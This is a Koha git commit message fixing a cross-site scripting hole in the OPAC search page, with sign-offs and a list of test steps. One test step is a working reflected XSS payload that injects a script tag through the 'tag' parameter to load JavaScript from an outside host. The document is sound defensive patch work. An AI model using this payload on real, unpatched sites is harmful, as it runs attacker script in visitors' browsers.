Bug 14418: XSS Vulnerabilities in OPAC search
authorChris Cormack <chrisc@catalyst.net.nz>
Thu, 18 Jun 2015 21:25:22 +0000 (09:25 +1200)
committerChris Cormack <chrisc@catalyst.net.nz>
Mon, 22 Jun 2015 21:43:47 +0000 (09:43 +1200)
commit21cc992e7e5a35ccf1b7614cae638c9863e2a35f
tree7f86661826b0868f0601c1f7f1b79b734f0ce4a4
parentafb00d13904052c71497834761e81996bc5f3d36
Bug 14418: XSS Vulnerabilities in OPAC search

Fix for /cgi-bin/koha/opac-search.pl

To test

1/ Hit /cgi-bin/koha/opac-search.pl?tag="><script
src='http://cst.sba-research.org/x.js'/>&q=a
2/ Notice the js is executed
3/ Apply patch
4/ Reload page, notice it is no longer executed
5/ Test the rss links work still

Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
Confirmed bug and that the patch fixes it.
Signed-off-by: Tomas Cohen Arazi <tomascohen@unc.edu.ar>
(cherry picked from commit 45dd7754019e8f525c8d52bf33c41016e5ccbfab)
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
koha-tmpl/opac-tmpl/bootstrap/en/modules/opac-results.tt